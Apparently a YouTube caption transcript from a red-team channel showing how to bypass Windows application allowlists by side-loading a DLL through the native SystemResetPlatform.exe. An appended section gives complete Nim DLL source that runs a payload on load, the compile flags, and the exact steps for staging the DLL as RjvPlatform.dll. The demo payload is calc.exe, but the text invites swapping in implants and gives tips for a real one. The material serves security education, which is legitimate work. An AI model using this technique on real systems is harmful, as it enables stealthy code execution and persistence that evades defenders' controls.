How Hackers Evade Program Allowlists with DLLs

Captions
The thing about defense is that administrators and key decision makers oftentimes want to go for the easiest, most turnkey solution, the path of least resistance, and this is a boon for the offense, because as a hacker, ethical hacker, penetration tester, red teamer, all they have to do is not try to take advantage of or dismantle a whole complete secure concept or idea; they just need to break the implementation. That means that misconfigurations, or accidental, forgotten, or just unknown things, gaps and holes in the security posture, can open the door for this threat actor or offensive individual to do some more damage. And of course that adversary will try to masquerade, or blend in, or remain stealthy and hidden in the work that they do, and one of those common techniques that we talk about in cybersecurity is called living off the land, where you can use a lot of the programs, utilities, and tools that are inherent and native to the operating system or the technology present so that they can do what they'd like to do.

So in this video we'd like to showcase one other living off the land technique that comes with it a little bit of an interesting conversation, or some other food for thought, or things that we should at least be cognizant of and maybe look back into for our own security settings. Now of course, hey, this is brought to light by Grzegorz Tworek (forgive me, 0gtweet, I know I always get your name wrong, my friend), but I'm just grateful and thankful for you allowing me and letting me; I asked for permission, he said of course, it's all online and free for exactly this purpose, to share and showcase what he has put together here. This is another DLL side-loading technique. It can work as a simple and maybe not so common way of bypassing application allow lists, right, things where you say, hey, I want only these programs to run. However, if that is configured, and maybe misconfigured, to only allow executable files like a .exe file and not DLLs, these dynamic link libraries that can still execute code, this could slide right under the radar.

And of course he includes the screenshot; in the background you can see, I think, Procmon or Process Monitor from the Sysinternals tool suite, taking a look at some of the features and functionality of SystemResetPlatform.exe. Now this is a native binary; it is installed, it's already on your Windows operating system. I'm rocking my Windows 10 machine as my host and that file is present, and it's going to do some weird and interesting stuff, because it looks like it will just naturally load an image or a DLL from this path and this location on the file system: C:\$SysReset\Framework\Stack\RjvPlatform.dll. Now I don't think naturally that this file exists, and if we just put one there it'll run it, it'll do it. If we can craft and create our own DLL, we as a threat actor, putting our hacker hat on, play pretend adversary, we can do whatever we want. Now you as the listening-in penetration tester or red teamer can of course use this for persistence, hey, maybe having some other backdoor that could escalate privileges or do something else, or stage and fake some part of your aspect of a script for some other initial access or exploit or privilege escalation that you might do, by trying to have some indirection and thinking this is a normal, natural, regular binary installed, living on the land, living off of the land, to do something else.

But enough banter. Anyway, I'm sorry for all that rambling; let's get to it, let's do some show and tell, let's do some live demos, and let's light off some fireworks here. So what I'm going to do is make a directory called nim, because in this video I would like to test the waters and kind of get a feel for you, your opinion and your input and your feedback on, hey, some more, maybe, I don't know, implant, malware, beacon development, some offensive security that we might be able to do in Nim, or Nim-lang. Now I know maybe I'll get some flak for this, because look, we got to be elite, we gotta be super hacker, cyber ninja warrior, cutting it up in C and C++ and low-level languages like Rust, but man, I'm scared of those things, I'm not good at it, so I thought, you know, hey, maybe we can bring the barrier to entry down a little bit and we could play with Nim, because it looks like Python, it just feels like Python, but you can still do some really cool elite cyber ninja warrior stuff with it. Anyway, let me know if you would like to see more Nim videos and content on a lot of that other offensive security stuff.

Now the reason I'm gonna be writing some code in Nim (we can create a mydll.nim with Sublime Text, our Sublime Text text editor, whatever editor you might like) is because we need to create a DLL. We need to cause some code to run that is not just a flat regular .exe; it has to match this pattern and schema as we saw within Sysinternals Process Monitor, right? The thing is, with Nim this is super duper easy. We are again standing on the shoulders of other incredible researchers and great folks that have done some phenomenal work: Grzegorz Tworek, and Marcello, or byt3bl33d3r, who has put together an incredible GitHub repository called OffensiveNim. Now you've probably seen a ton of these; there is an OffensiveRust, there is an offensive C# or whatever, there's offensive Golang, there's plenty of these cool things that showcase some syntax, snippets, and code in weaponizing a language for other offensive security work like implant development or malware development, and this is phenomenal because there's so much cool stuff. There is a little table of contents here, a little bit of an index of other examples that you might be able to go take a look at, like using Win32 API calls, hey, digging into some of the natural native NT API, using the common language runtime, building up named pipes, doing stuff with AMSI, or AMSI patching, ETW, so, so much cool stuff that you should absolutely look at if you haven't already. But we are going to start small; we're going to crawl, not run here, before we run. Anyway, we're going to create some Windows DLLs with a DllMain function.

Actually, before we start cutting up the code, let's hear a quick word from today's sponsor, PlexTrac. When you're performing a penetration test, you're in the zone, you're hacking away and you're having fun gathering findings, beating up vulnerabilities, and earning domain admin, but you might be dreading the work that comes after: you have to write a report. But writing a pentest report doesn't have to be dull and boring and long and tedious; in fact, it can be a breeze. You don't even have to worry about your report, because PlexTrac can handle it for you. If you aren't familiar, PlexTrac is the premier cybersecurity reporting and collaboration platform that makes penetration testers, red teamers, and cybersecurity teams more efficient, effective, and proactive. PlexTrac removes the pain of reporting and lets you collaborate between both red and blue teams for effective purple teaming and faster remediation. The PlexTrac platform lets you easily aggregate findings, pull in reusable content from write-up databases and content libraries, and track and measure engagement progress in real time. Import assets from CSV files, or Nmap, or Nessus, and so many others of your favorite tools; with over 25 integrations you can streamline your reporting and collaboration process right into your existing workflow. You can do even faster testing with PlexTrac Runbooks and show the impact to managers and leadership with PlexTrac's analytics and visualizations. Within minutes you can have your pentest report done and dusted, all with your team's logo and details, and then sent off to the client. Spend more time hacking and less time reporting. Learn how you can boost your team's efficiency by 30 percent and cut reporting time by up to 65 percent with PlexTrac. Seriously, check out PlexTrac; I have great colleagues and peers that use PlexTrac every day for reporting. Get started with my link below in the video description and let you and your team get back to hacking. Huge thanks to PlexTrac for sponsoring this video.

We're going to create some Windows DLLs with a DllMain function, because DLLs, the dynamic link libraries, will naturally invoke and run an exported function, which is normally, naturally, DllMain on Windows and Windows operating systems. Now Nim does something a little bit odd, but that's okay; it's again super easy to kind of work through, and again thanks to all the great people that have already done this work for us. The Nim compiler tries to create its own DllMain function automatically, but it doesn't actually export it; it's not something you could actually try to call or use through and from that DLL, the dynamic link library. You have to create and export a DllMain yourself by passing --nomain to the Nim compiler and then defining that DllMain with the appropriate pragmas: stdcall, exportc, dynlib. Now you need to create your own NimMain that will initialize Nim's garbage collector, and that is apparently extremely important, because otherwise your computer will just literally explode, which I have not validated but I will press the "I believe" button and trust. Now they're going to end up using the winim library, which is some super cool library and package and module of Nim code that will just naturally work with all the Win32 and, like, Windows operating system types and functions and other methods and names and variables and things that would just be super duper helpful and handy for us to have. It's like the windows.h header file in C and C++, for you low-level nerds, and this is exactly how we can just build one out. I'm gonna go ahead and copy this code. It's creating a procedure or a function for NimMain, giving it the .cdecl and importc pragmas, and then building out our own DllMain taking in the appropriate usual syntax for arguments to go to a DllMain function, like the handle instance, like the reason that this DLL has been called, and other reserved keywords, etc.

Now if the reason it's called is because a process has attached to it, or that DLL is just getting started and spoken into existence, they do a simple message box, like a Win32 API call. Now we can do that super duper easily because of winim, and they're using a lean rendition of it, super small, super duper easy. Again we can just copy and paste that code and I will go bring it into my text editor in Sublime Text, where I can save this with Ctrl+S. Now this is easy; this is literally all that we need. If we want to get a little bit clever, I don't know, maybe not a message box, we could do something a little bit more flashy, hey, flex some super tiny Nim muscles for the moment. Let's import osproc so we can start new processes within our operating system, and then we could comment out our message box with a little hashtag, octothorpe, of course, very Python-like in Nim syntax. This is a crash course; I'm sorry, maybe we could get like a full-blown tutorial series on Nim, maybe that'd be fun. But anyway, we could use osproc, this newly imported library or module here, and let's try to use an execProcess, and we can pass in like a calc.exe, as a calculator, just a benign, simple payload. We could get into, I don't know, maybe trying to carve up some implants and beacons and Meterpreter callbacks. The thing is, Nim is very notoriously known for a lot of malware development now, so it's pretty easily signatured, but that's okay, it's malware; I intend for it to be detected if we do any malicious stuff. This actually returns, however, a value that must be worked with; if we aren't going to end up working with the return value, then we should get rid of it, so we should kind of discard that, and that should, fingers crossed, be enough for us. That's all we need to do, super duper easy, again copying and pasting and slapping in some of the other pragmas that are necessary there. I think with that we can go back to our command line and let's try to compile this thing.

We would normally use nim, if we had it installed, with c to compile mydll.nim. The thing is, when we do this we're going to get spat out a mydll.exe; it is an executable file, which is not what we want right now; we want a DLL. So there is some other special syntax that we might be able to use to compile, and of course this repository already gives us the sweet sauce, the secret syntax, the semantic sugar that we need here: nim c, -d with the MinGW (or, excuse me) compiler, --app=lib to define it as a library, --nomain so we don't have DllMain automatically created for us, --cpu for the CPU architecture, and then mynim.dll, which I believe should actually be the source code file that we want to use here. So again we can just copy that syntax, bring it back to my command line, I'll paste this in, and I'll change this to mydll.nim as the file extension here, not our compiled binary. Let this thing go; Nim will compile it nice and easy, and now we have a DLL, which is perfect, because obviously trying to run mydll.exe would not work, it would not do anything, because the code is put together to act as a DLL. Let's go ahead and remove mydll.exe because it's not a DLL, but let's run our mydll.dll. I guess we're just going to fire up PE Explorer, which I guess is a, I don't know, function that I have set up on my machine to naturally open DLLs. The thing is, it didn't pop up the calculator; it didn't run the code that we wanted, because we didn't call our DllMain as an exported function out of our dynamic link library. Does that make any sense? What we can do is use rundll, rundll32, which does some odd stuff for me when I'm in PowerShell, so I'm going to actually drop down into CMD, or cmd.exe, old school command prompt, and then I can probably pretty safely run rundll32.exe mydll.dll. Now we will need to give it the name of the function that we might want to run, like the export, and that syntax is with a comma, so let's use DllMain following that, and fingers crossed we get our calculator.

We did it; we built our stupid simple proof-of-concept payload. Now let's go take a look at what we could use with Grzegorz Tworek's little living off the land binary here. This is cool; this is where I want your imagination to run wild, because we can do whatever we want in this code, but right now we're doing the small stuff. But we can stage it to not just run, oh, calc.exe or mymalware.dll; we can hide it and mask it within the system reset platform, right? So the syntax that they used was: they make a directory with md, one of the aliases for that, and that was in C:\$SysReset\Framework\Stack (framework, stack, there we go), and then we'll want to copy our DLL, mydll, which should be copy in the syntax, to that location under that, what is it, RjvPlatform.dll, yeah, RjvPlatform.dll. Copied, there we go. And now we'll call, from System32, the natural install path for Windows, SystemResetPlatform, SystemResetPlatform.exe. Now we can trust and press the "I believe" button; we don't need to fire up Procmon unless you really wanted to see this thing in action. It will end up loading and kicking off our DLL. SystemResetPlatform.exe, hit enter, and there's our calculator. Of course, simple, benign payload, but I want you as our red teamer or hacker, ethical, I don't know, programmer, whatever, development, malware engineer, that could be an opportunity for you to craft something else a little bit stealthy. And remember, here the benefit is that this is a dynamic link library; it's a DLL, it is not a .exe. You're doing some interaction with DLL side-loading, which again has that interesting conversation of, okay, if you're up against application allow listing or deny listing, where you're not allowed to run things that aren't native or inherent .exes, like local binary files, well, maybe they've forgotten something, or there's a little bit of a gap where those DLLs are allowed to run. And this is exactly the conversation that was had on Twitter.

An individual said, look, I did some basic testing with, like, AppLocker or WDAC, Windows Defender Application Control, on trying to block DLLs, but to be honest it's tough; like, it's really annoying, like, you need a lot of this functionality for, of course, Windows applications and programs, and there are, like, unsigned DLLs just floating around out there, even if they go with signed applications and binaries and software. Grzegorz says, exactly, it's exactly why DLL allow listing is often called phase two and it's never actually implemented. Now of course, hey, take that with a grain of salt; maybe your organization is doing it right, you got security locked down and you've completed all of that great allow listing and your zero trust topology, etc. Thumbs up. They chat about this a little bit more; you know, I think the only way to do it is, like, big data that Microsoft might have with a lot of the trusted installers in WDAC. Even then it's not easy; there's a whole lot of administrative burden, it digs into user experience, and you've got again that balancing scale of convenience versus security, privacy versus just being able to get your job done, right? Really interesting stuff here. If you would be willing to dig into it, I can include that link in the description, and I hope this is kind of a neat, cool trick for you. Again, kudos, shout out, credit where credit is due, 0gtweet is always putting out incredible stuff. Thank you so much for watching, everybody. I hope you enjoyed this video; hope it was a little bit of a cutesy, fun little showcase, maybe digging into a little bit of Nim, or at least testing the water, dipping our toes in the pool to see: do you guys want to see more Nim? Like, man, should that be like its own thing, maybe some more malware development, implant stuff that I would love to get into for offensive security research? Let me know, let me know, give me that feedback in the comments, and please, please, please do all those YouTube algorithm things, like, comment, subscribe if you like this video, and if you are willing to support the channel and the great stuff we do, there's Patreon and PayPal links in the description. And please, pretty please, check out our sponsor; they're doing some incredible stuff in the penetration testing and red teaming and purple teaming space just as well. We're all in this thing together; we're standing on the shoulders of giants, and you know what, it takes everyone playing in concert, working as a team, to make security better. Thanks, everyone, see you in the next video.
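The DLL described in the captions above, written out as an added example (this is editorial example code, not the video's mydll.nim and not a snippet from the OffensiveNim repository): a Nim DLL built with --nomain that exports its own DllMain, calls NimMain to initialize the runtime, and launches calc.exe on process attach. The one-time initialization guard, the use of startProcess instead of execProcess, and the calc.exe path are assumptions made here for the example.

```nim
# Added example (not the video's file or OffensiveNim's own snippet): a minimal
# Nim DLL that exports DllMain by hand. Built with --nomain so the compiler does
# not emit its own, unexported DllMain; we import NimMain and call it ourselves.
# The calc.exe payload and the one-time init guard are assumptions of this example.
import winim/lean
import osproc

# Nim's runtime/GC initializer. The compiler still generates it under --nomain,
# but nothing calls it, so the DLL must call it before using strings, seqs or
# anything else the GC manages.
proc NimMain() {.cdecl, importc.}

# DllMain is invoked on DLL_PROCESS_ATTACH and again for every thread
# attach/detach, so keep the runtime init and the payload to a single run.
# Declared without an initializer so no Nim module-init code touches it.
var initialized: bool

# Benign demo payload: spawn the calculator and return without waiting.
# startProcess (rather than execProcess) so DllMain does not block under the
# loader lock waiting for the child to exit; poParentStreams avoids creating pipes.
proc runPayload() =
  let p = startProcess("C:\\Windows\\System32\\calc.exe",
                       options = {poParentStreams})
  close(p)   # drop our handle; the child keeps running

# Exported with the Win32 calling convention and the usual DllMain signature:
# module handle, reason for the call, reserved pointer.
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID): BOOL
    {.stdcall, exportc, dynlib.} =
  if fdwReason == DLL_PROCESS_ATTACH and not initialized:
    NimMain()
    initialized = true
    runPayload()
  return TRUE
```

Build it on Windows with `nim c --app=lib --nomain --cpu=amd64 -d:release mydll.nim` (add `-d:mingw` when cross-compiling from Linux), and exercise it the same way the video does: `rundll32.exe mydll.dll,DllMain` from cmd.exe loads the DLL, which fires DllMain on attach. To stage it behind the native binary, create `C:\$SysReset\Framework\Stack`, copy the DLL there as `RjvPlatform.dll`, and run `C:\Windows\System32\SystemResetPlatform.exe`. Two practitioner caveats: if you type these paths in PowerShell rather than cmd, single-quote them, because an unquoted `$SysReset` is parsed as a PowerShell variable and silently expands to nothing, which is one plausible source of the "odd stuff" mentioned above; and because DllMain runs under the loader lock, a real implant should do its work on a new thread rather than inline as this demo does. On the defensive side, the captions note that this path is not expected to exist on a stock install, so a file-creation or module-load event under `C:\$SysReset\Framework\Stack` is a cheap, high-signal thing to alert on regardless of whether DLL allow listing is in place.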
Info
Channel: John Hammond
Views: 45,528
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: 9fV8tWb2W1M
Length: 17min 27sec (1047 seconds)
Published: Thu Jun 15 2023